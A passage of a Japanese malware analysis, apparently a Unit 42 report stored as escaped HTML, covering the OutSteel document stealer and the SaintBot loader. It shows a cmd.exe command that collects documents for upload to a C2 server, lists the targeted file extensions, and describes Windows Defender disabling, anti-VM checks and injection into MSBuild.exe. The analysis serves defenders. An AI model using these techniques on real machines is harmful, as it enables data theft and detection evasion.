OutSteel\u306e\u30e1\u30a4\u30f3\u306e\u30d5\u30a1\u30a4\u30eb\u691c\u7d22\u30eb\u30fc\u30d7<\/figcaption><\/figure>\n<p>\u30b9\u30ad\u30e3\u30f3\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306bCMD\u30b3\u30de\u30f3\u30c9\u3067\u884c\u3044\u307e\u3059\u3002<\/p>\n<p style=\"text-align: center;\"><span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe \/U \/C DIR \"\\Users\\Admin\\*.docx\" \/S \/B\/ A<\/span><\/p>\n<p>OutSteel\u304c\u4e0a\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u53ce\u96c6\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u62e1\u5f35\u5b50\u306e\u30ea\u30b9\u30c8\u3092\u88682\u306b\u793a\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u62e1\u5f35\u5b50\u304c\u9078\u629e\u3055\u308c\u3066\u3044\u308b\u7406\u7531\u306f\u3001\u6f5c\u5728\u7684\u306b\u6a5f\u5bc6\u6027\u306e\u9ad8\u3044\u30d5\u30a1\u30a4\u30eb\u3092\u53ce\u96c6\u3057\u3088\u3046\u3068\u3057\u3066\u306e\u3053\u3068\u3068\u601d\u308f\u308c\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30d5\u30a1\u30a4\u30eb\u30bf\u30a4\u30d7\u306b\u306f\u3001Microsoft Office\u30b9\u30a4\u30fc\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u7528\u306e\u6587\u66f8\u3001Microsoft Access\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30d5\u30a1\u30a4\u30eb\u3001Microsoft Outlook\u30c7\u30fc\u30bf\u30d5\u30a1\u30a4\u30eb\u306e\u307b\u304b\u3001\u3055\u307e\u3056\u307e\u306a\u30a2\u30fc\u30ab\u30a4\u30d6\u30d5\u30a1\u30a4\u30eb\u306a\u3069\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<table style=\"width: 102.458%;\">\n<tbody>\n<tr>\n<td style=\"width: 13.2626%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.doc<\/span><\/td>\n<td style=\"width: 10.8753%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.ppt<\/span><\/td>\n<td style=\"width: 11.6711%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.xls<\/span><\/td>\n<td style=\"width: 12.9973%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.rtf<\/span><\/td>\n<td style=\"width: 15.1194%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.accdb<\/span><\/td>\n<td style=\"width: 11.4058%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.pst<\/span><\/td>\n<td style=\"width: 9.81432%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.zip<\/span><\/td>\n<td style=\"width: 283.554%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.txt<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 13.2626%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.docx<\/span><\/td>\n<td style=\"width: 10.8753%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">.pptx<\/span><\/td>\n<td style=\"width: 11.6711%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.xlsx<\/span><\/td>\n<td style=\"width: 12.9973%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.dot<\/span><\/td>\n<td style=\"width: 15.1194%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.pot<\/span><\/td>\n<td style=\"width: 11.4058%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.ppa<\/span><\/td>\n<td style=\"width: 9.81432%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.tar<\/span><\/td>\n<td style=\"width: 283.554%;\"><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 13.2626%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.pdf<\/span><\/td>\n<td style=\"width: 10.8753%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.dot<\/span><\/td>\n<td style=\"width: 11.6711%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.csv<\/span><\/td>\n<td style=\"width: 12.9973%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.mdb<\/span><\/td>\n<td style=\"width: 15.1194%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.pps<\/span><\/td>\n<td style=\"width: 11.4058%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.rar<\/span><\/td>\n<td style=\"width: 9.81432%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">*.7z<\/span><\/td>\n<td style=\"width: 283.554%;\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><sup>\u88682 OutSteel\u304c\u53ce\u96c6\u3059\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u62e1\u5f35\u5b50<\/sup><\/span><\/p>\n<p>AutoIT\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3053\u306e\u30b3\u30de\u30f3\u30c9\u304b\u3089\u306e\u51fa\u529b\u3092\u8aad\u307f\u8fbc\u3093\u3067\u5404\u30d5\u30a1\u30a4\u30eb\u3092<a href=\"https:\/\/github.com\/jesobreira\/HTTP.au3\/blob\/master\/HTTP.au3\">HTTP.au3<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3063\u3066C2\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002<\/p>\n<p>\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u3059\u3079\u3066\u306e\u95a2\u9023\u30d5\u30a1\u30a4\u30eb\u3092C2\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u7d42\u308f\u308b\u3068\u3001\u6b21\u306b\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u30bb\u30ab\u30f3\u30c0\u30eaC2\u306e<span style=\"font-family: 'courier new', courier, monospace;\">eumr[.]site<\/span>\u304b\u3089<span style=\"font-family: 'courier new', courier, monospace;\">%TEMP%\\svjhost.exe<\/span>\u306b\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3053\u308c\u3082\u307e\u305fSHCore2 DLL\u304b\u3089\u62bd\u51fa\u3055\u308c\u305fSaintBot\u306e.NET \u30ed\u30fc\u30c0\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u306b\u6210\u529f\u3059\u308b\u3068\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u304b\u3089\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122089\" aria-describedby=\"caption-attachment-122089\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122090 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-31.png\" alt=\"OutSteel\u304cSaintBot\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066rmm.bat\u3092\u5b9f\u884c\" width=\"900\" height=\"191\" \/><figcaption id=\"caption-attachment-122089\" class=\"wp-caption-text\">\u56f38 OutSteel\u304cSaintBot\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066rmm.bat\u3092\u5b9f\u884c<\/figcaption><\/figure>\n<p>\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u3001\u81ea\u5206\u81ea\u8eab\u3068\u5143\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u524a\u9664\u3059\u308b<span style=\"font-family: 'courier new', courier, monospace;\">rmm.bat<\/span>\u3068\u3044\u3046\u540d\u524d\u306e<span style=\"font-family: 'courier new', courier, monospace;\">.bat<\/span>\u30d5\u30a1\u30a4\u30eb\u3092\u73fe\u5728\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u4f5c\u6210\u3057\u3001\u5b9f\u884c\u4e2d\u306e\u3059\u3079\u3066\u306e<span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>\u30d7\u30ed\u30bb\u30b9\u3092\u7d42\u4e86\u3055\u305b\u3066\u304b\u3089\u7d42\u4e86\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122091\" aria-describedby=\"caption-attachment-122091\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122092 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-32.png\" alt=\"rmm.bat\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9\" width=\"900\" height=\"104\" \/><figcaption id=\"caption-attachment-122091\" class=\"wp-caption-text\">\u56f39 rmm.bat\u30d5\u30a1\u30a4\u30eb\u306e\u5185\u5bb9<\/figcaption><\/figure>\n<p>\u3053\u306e\u6642\u70b9\u3067AutoIT\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u7d42\u4e86\u3057\u3001SaintBot\u304c\u30e1\u30e2\u30ea\u5185\u306b\u6b8b\u308a\u307e\u3059\u3002<\/p>\n<h4>windows_defender_disable.bat<\/h4>\n<p>\u3053\u306e\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u306fWindows Defender\u306e\u6a5f\u80fd\u3092\u7121\u52b9\u306b\u3059\u308b\u306e\u306b\u4f7f\u308f\u308c\u307e\u3059\u3002\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc\u3092\u5909\u66f4\u3059\u308b\u8907\u6570\u306e\u30b3\u30de\u30f3\u30c9\u3092CMD\u7d4c\u7531\u3067\u5b9f\u884c\u3057\u3001Windows Defender\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u30bf\u30b9\u30af\u3092\u7121\u52b9\u306b\u3059\u308b\u3053\u3068\u3067\u3053\u308c\u3092\u5b9f\u73fe\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u3067<a href=\"https:\/\/github.com\/vs-toad\/Windows\/blob\/master\/windows_defender_disable.bat\">GitHub<\/a>\u306b\u516c\u958b\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3001\u3053\u306e\u7279\u5b9a\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u306f\u30ab\u30b9\u30bf\u30e0\u3055\u308c\u3066\u3044\u308b\u8981\u7d20\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u3053\u306e\u7121\u52b9\u5316\u51e6\u7406\u306f\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u304cWindows Defender\u306b\u691c\u51fa\u3055\u308c\u308b\u30ea\u30b9\u30af\u3092\u4e0b\u3052\u308b\u305f\u3081\u306b\u884c\u308f\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122093\" aria-describedby=\"caption-attachment-122093\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122094 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-33.png\" alt=\"windows_defender_disable.bat\u30b9\u30af\u30ea\u30d7\u30c8\" width=\"900\" height=\"490\" \/><figcaption id=\"caption-attachment-122093\" class=\"wp-caption-text\">\u56f310. windows_defender_disable.bat\u30b9\u30af\u30ea\u30d7\u30c8<\/figcaption><\/figure>\n<h4>SaintBot .NET \u30ed\u30fc\u30c0<\/h4>\n<p>SaintBot .NET\u30ed\u30fc\u30c0\u3082\u8907\u6570\u306e\u30b9\u30c6\u30fc\u30b8\u3067\u69cb\u6210\u3055\u308c\u3066\u304a\u308a\u3001\u96e3\u8aad\u5316\u306e\u30ec\u30d9\u30eb\u3082\u3055\u307e\u3056\u307e\u3067\u3059\u3002PowerShell\u306e\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u30921\u3064\u5b9f\u884c\u3059\u308b\u3068\u3053\u308d\u304b\u3089\u59cb\u307e\u308a\u3001\u3053\u3053\u304b\u3089<span style=\"font-family: 'courier new', courier, monospace;\">timeout 20<\/span>\u3092\u6e21\u3057\u3066<span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span>\u3092\u5b9f\u884c\u3059\u308b\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u30bf\u30a4\u30e0\u30a2\u30a6\u30c8\u304c\u7d42\u308f\u308b\u3068\u30ed\u30fc\u30c0\u304c\u518d\u958b\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122095\" aria-describedby=\"caption-attachment-122095\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122096 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-34.png\" alt=\"PowerShell\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306e\u5b9f\u884c\" width=\"900\" height=\"272\" \/><figcaption id=\"caption-attachment-122095\" class=\"wp-caption-text\">\u56f311. PowerShell\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306e\u5b9f\u884c<\/figcaption><\/figure>\n<p>\u30ed\u30fc\u30c0\u306e\u6700\u521d\u306e\u30ec\u30a4\u30e4\u3067\u9006\u9806\u306b\u3057\u305f.NET\u30d0\u30a4\u30ca\u30ea\u3092\u30ea\u30bd\u30fc\u30b9\u304b\u3089\u62bd\u51fa\u5f8c\u3001\u5143\u306b\u623b\u3057\u3066\u30e1\u30e2\u30ea\u306b\u30ed\u30fc\u30c9\u30fb\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122097\" aria-describedby=\"caption-attachment-122097\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122098 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-35.png\" alt=\"\u30ea\u30bd\u30fc\u30b9\u5185\u306e\u9006\u9806\u306b\u306a\u3063\u305f\u30d0\u30a4\u30ca\u30ea\" width=\"900\" height=\"322\" \/><figcaption id=\"caption-attachment-122097\" class=\"wp-caption-text\">\u56f312. \u30ea\u30bd\u30fc\u30b9\u5185\u306e\u9006\u9806\u306b\u306a\u3063\u305f\u30d0\u30a4\u30ca\u30ea<\/figcaption><\/figure>\n<p>\u3053\u306e\u7b2c2\u30ec\u30a4\u30e4\u306f\u7b2c1\u30ec\u30a4\u30e4\u3088\u308a\u3082\u306f\u308b\u304b\u306b\u591a\u304f\u306e\u96e3\u8aad\u5316\u3092\u542b\u3093\u3067\u304a\u308a\u3001\u7d04140\u7a2e\u985e\u306e\u7570\u306a\u308b\u30af\u30e9\u30b9\u3092\u4f7f\u3063\u3066\u96e3\u8aad\u5316\u306e\u96e3\u8aad\u5316\u3092\u884c\u3063\u3066\u3044\u307e\u3059\u3002\u307e\u305f\u3053\u308c\u3089\u306e\u30af\u30e9\u30b9\u306b\u306f\u3001\u30ed\u30fc\u30c9\u3055\u308c\u305f\u30e2\u30b8\u30e5\u30fc\u30eb\u306e\u30ea\u30b9\u30c8\u306b<span style=\"font-family: 'courier new', courier, monospace;\">Sbiedll.dll<\/span>\u304c\u5b58\u5728\u3059\u308b\u304b\u3069\u3046\u304b\u306e\u30c1\u30a7\u30c3\u30af\u3001\u30de\u30b7\u30f3\u540d\u306e<span style=\"font-family: 'courier new', courier, monospace;\">HAL9TH<\/span>\u3068\u306e\u6bd4\u8f03\u3001\u30e6\u30fc\u30b6\u30fc\u540d\u306e<span style=\"font-family: 'courier new', courier, monospace;\">JohnDoe<\/span>\u3068\u306e\u6bd4\u8f03\u3001BIOS\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u65e2\u77e5\u306e\u4eee\u60f3\u30de\u30b7\u30f3\u8b58\u5225\u5b50\u306e\u3082\u306e\u304b\u3069\u3046\u304b\u306e\u30c1\u30a7\u30c3\u30af\u306a\u3069\u3001\u4eee\u60f3\u30de\u30b7\u30f3\u3068\u30b5\u30f3\u30c9\u30dc\u30c3\u30af\u30b9\u306b\u95a2\u3059\u308b\u30c1\u30a7\u30c3\u30af\u3082\u8907\u6570\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122099\" aria-describedby=\"caption-attachment-122099\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122100 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-36.png\" alt=\"\u4eee\u60f3\u30de\u30b7\u30f3\u5bfe\u7b56\u306e\u30c1\u30a7\u30c3\u30af\" width=\"900\" height=\"333\" \/><figcaption id=\"caption-attachment-122099\" class=\"wp-caption-text\">\u56f313. \u4eee\u60f3\u30de\u30b7\u30f3\u5bfe\u7b56\u306e\u30c1\u30a7\u30c3\u30af<\/figcaption><\/figure>\n<p>\u3053\u308c\u3089\u306e\u30c1\u30a7\u30c3\u30af\u3092\u56de\u907f\u3059\u308b\u6700\u3082\u624b\u3063\u53d6\u308a\u65e9\u3044\u65b9\u6cd5\u306f\u3001<span style=\"font-family: 'courier new', courier, monospace;\">Invoke()<\/span>\u95a2\u6570\u306b\u30d6\u30ec\u30fc\u30af\u30dd\u30a4\u30f3\u30c8\u3092\u8a2d\u5b9a\u3057\u3001\u30e1\u30e2\u30ea\u5185\u306e\u5024\u3092\u5909\u66f4\u3059\u308b\u3053\u3068\u3067\u3001\u6c7a\u3057\u3066\u30b5\u30f3\u30d7\u30eb\u306b\u4e00\u81f4\u3092\u691c\u51fa\u3055\u305b\u306a\u3044\u3088\u3046\u306b\u3059\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n<p>\u3059\u3079\u3066\u306e\u30c1\u30a7\u30c3\u30af\u306b\u5408\u683c\u3059\u308b\u3068\u3001\u30ed\u30fc\u30c0\u306e\u7b2c2\u30b9\u30c6\u30fc\u30b8\u3068\u3057\u3066\u3001SaintBot\u306e\u30d0\u30a4\u30ca\u30ea\u3092\u30ea\u30bd\u30fc\u30b9\u304b\u3089\u62bd\u51fa\u30fb\u5fa9\u53f7\u3057\u307e\u3059\u3002\u305d\u3053\u304b\u3089<span style=\"font-family: 'courier new', courier, monospace;\">VirtualAllocEx<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">WriteProcessMemory<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">CreateProcessA<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">SetThreadContext<\/span>\u306a\u3069\u3001\u3055\u307e\u3056\u307e\u306aAPI\u547c\u3073\u51fa\u3057\u306e\u8aad\u307f\u8fbc\u307f\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u547c\u3073\u51fa\u3057\u3092\u4f7f\u3063\u3066<span style=\"font-family: 'courier new', courier, monospace;\">MSBuild.exe<\/span>\u3092\u30b5\u30b9\u30da\u30f3\u30c9\u72b6\u614b\u3067\u8d77\u52d5\u3057\u3001\u305d\u3053\u306b\u5fa9\u53f7\u3055\u308c\u305fSaintBot\u30d0\u30a4\u30ca\u30ea\u3092\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30a8\u30f3\u30c8\u30ea\u30dd\u30a4\u30f3\u30c8\u3092\u6307\u3059\u3088\u3046\u306b\u30b9\u30ec\u30c3\u30c9\u306e\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u3092\u5909\u66f4\u3057\u3001\u30d7\u30ed\u30bb\u30b9\u3092\u518d\u958b\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122101\" aria-describedby=\"caption-attachment-122101\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122102 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-37.png\" alt=\"\u30d7\u30ed\u30bb\u30b9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u884c\u3046API\u306e\u30ed\u30fc\u30c9\" width=\"900\" height=\"246\" \/><figcaption id=\"caption-attachment-122101\" class=\"wp-caption-text\">\u56f314. \u30d7\u30ed\u30bb\u30b9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u884c\u3046API\u306e\u30ed\u30fc\u30c9<\/figcaption><\/figure>\n<h4>SaintBot\u30da\u30a4\u30ed\u30fc\u30c9<\/h4>\n<p>SaintBot\u306f\u6700\u8fd1\u767a\u898b\u3055\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u30ed\u30fc\u30c0\u3067\u30012021\u5e744\u6708\u306b<a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2021\/04\/a-deep-dive-into-saint-bot-downloader\/\">MalwareBytes<\/a>\u304c\u6587\u66f8\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u306f\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u306e\u8981\u6c42\u306b\u5fdc\u3058\u3066\u8ffd\u52a0\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u6a5f\u80fd\u304c\u3042\u308a\u3001\u30d7\u30ed\u30bb\u30b9\u3092\u751f\u6210\u3057\u3066\u30a4\u30f3\u30b8\u30a7\u30af\u30c8\u3059\u308b\u3001\u30ed\u30fc\u30ab\u30eb\u30e1\u30e2\u30ea\u3078\u306e\u30ed\u30fc\u30c9\u3059\u308b\u306a\u3069\u3001\u8907\u6570\u306e\u7570\u306a\u308b\u624b\u6cd5\u3067\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002\u307e\u305f\u5fc5\u8981\u306b\u5fdc\u3058\u3066\u30c7\u30a3\u30b9\u30af\u4e0a\u306e\u81ea\u5206\u81ea\u8eab\u3092\u66f4\u65b0\u3057\u3001\u305d\u306e\u75d5\u8de1\u3092\u6d88\u3059\u3053\u3068\u3082\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>SHA-256: <span style=\"font-family: 'courier new', courier, monospace;\">e8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c<\/span><\/p>\n<p>MSBuild\u30d7\u30ed\u30bb\u30b9\u5185\u3067\u5b9f\u884c\u3055\u308c\u308b\u3068\u3001SaintBot\u306f\u8907\u6570\u306e\u89e3\u6790\u5bfe\u7b56\u7528\u306e\u30c1\u30a7\u30c3\u30af\u3068\u30ed\u30b1\u30fc\u30eb\u306e\u30c1\u30a7\u30c3\u30af\u3092\u884c\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30c1\u30a7\u30c3\u30af\u306e\u3044\u305a\u308c\u304b\u304c\u5931\u6557\u3059\u308b\u3068\u3001<span style=\"font-family: 'courier new', courier, monospace;\">del.bat<\/span>\u3068\u3044\u3046\u30d0\u30c3\u30c1\u30b9\u30af\u30ea\u30d7\u30c8\u304c<span style=\"font-family: 'courier new', courier, monospace;\">%APPDATA%<\/span>\u30d5\u30a9\u30eb\u30c0\u306b\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u3066\u5b9f\u884c\u3055\u308c\u3001SaintBot\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u3064\u306a\u304c\u308b\u30d5\u30a1\u30a4\u30eb\u304c\u30b7\u30b9\u30c6\u30e0\u304b\u3089\u524a\u9664\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122103\" aria-describedby=\"caption-attachment-122103\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122104 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-38.png\" alt=\"SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306e\u30b7\u30b9\u30c6\u30e0\u30ed\u30b1\u30fc\u30eb\u30c1\u30a7\u30c3\u30af\" width=\"900\" height=\"233\" \/><figcaption id=\"caption-attachment-122103\" class=\"wp-caption-text\">\u56f315. \u30b7\u30b9\u30c6\u30e0\u30ed\u30b1\u30fc\u30eb\u30c1\u30a7\u30c3\u30af<\/figcaption><\/figure>\n<p>\u30c1\u30a7\u30c3\u30af\u306b\u5408\u683c\u3059\u308b\u3068\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306f<span style=\"font-family: 'courier new', courier, monospace;\">%LOCALAPPDATA%\\zz%USERNAME%<\/span>\u3068\u3044\u3046\u30d1\u30b9\u304b\u3089<span style=\"font-family: 'courier new', courier, monospace;\">slideshow.mp4<\/span>\u3092\u898b\u3064\u3051\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3053\u306e<span style=\"font-family: 'courier new', courier, monospace;\">slideshow.mp4<\/span>\u306f\u5b9f\u969b\u306b\u306f<span style=\"font-family: 'courier new', courier, monospace;\">ntdll.dll<\/span>\u306e\u30b3\u30d4\u30fc\u3067\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u304c\u898b\u3064\u304b\u3089\u306a\u3044\u5834\u5408\u3001SaintBot\u306f\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u307e\u3060\u30b7\u30b9\u30c6\u30e0\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u306a\u3044\u3068\u5224\u65ad\u3057\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u51e6\u7406\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002\u3053\u306e\u3055\u3044\u3001<span style=\"font-family: 'courier new', courier, monospace;\">%LOCALAPPDATA%<\/span>\u30d5\u30a9\u30eb\u30c0\u5185\u306b<span style=\"font-family: 'courier new', courier, monospace;\">zz%USERNAME%<\/span>\u3068\u3044\u3046\u540d\u524d\u3092\u8a2d\u5b9a\u3057\u305f\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001\u30ed\u30fc\u30ab\u30eb\u306b\u3042\u308b<span style=\"font-family: 'courier new', courier, monospace;\">ntdll.dll<\/span>\u306e\u30d0\u30a4\u30ca\u30ea\u3092\u65b0\u3057\u304f\u4f5c\u6210\u3057\u305f\u30d5\u30a9\u30eb\u30c0\u306b\u30b3\u30d4\u30fc\u3057\u3001<span style=\"font-family: 'courier new', courier, monospace;\">slideshow.mp4<\/span>\u3068\u3044\u3046\u540d\u524d\u306b\u5909\u66f4\u3057\u307e\u3059\u3002\u304f\u308f\u3048\u3066<span style=\"font-family: 'courier new', courier, monospace;\">%USERNAME%.vbs<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">%USERNAME%.bat<\/span>\u3068\u3044\u3046\u540d\u524d\u306e<span style=\"font-family: 'courier new', courier, monospace;\">.vbs<\/span>\u3068<span style=\"font-family: 'courier new', courier, monospace;\">.bat<\/span>\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u30c9\u30ed\u30c3\u30d7\u3055\u308c\u307e\u3059\u3002\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u30eb\u30fc\u30c1\u30f3\u304c\u5b8c\u4e86\u3059\u308b\u3068\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3082\u3046\u4e00\u5ea6\u81ea\u8eab\u3092\u5b9f\u884c\u3057\u3066\u7d42\u4e86\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_122105\" aria-describedby=\"caption-attachment-122105\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-122106 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2022\/02\/word-image-39.png\" alt=\"SaintBot\u7528\u306e\u4e3b\u8981\u30d5\u30a9\u30eb\u30c0\u306e\u8a2d\u5b9a\" width=\"900\" height=\"470\" \/><figcaption id=\"caption-attachment-122105\" class=\"wp-caption-text\">\u56f316. SaintBot\u7528\u306e\u4e3b\u8981\u30d5\u30a9\u30eb\u30c0\u306e\u8a2d\u5b9a<\/figcaption><\/figure>\n<p>\u521d\u671f\u306e\u30c1\u30a7\u30c3\u30af\u3067<span style=\"font-family: 'courier new', courier, monospace;\">slideshow.mp4<\/span>\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u3001\u305d\u308c\u304c<span style=\"font-family: 'courier new', courier, 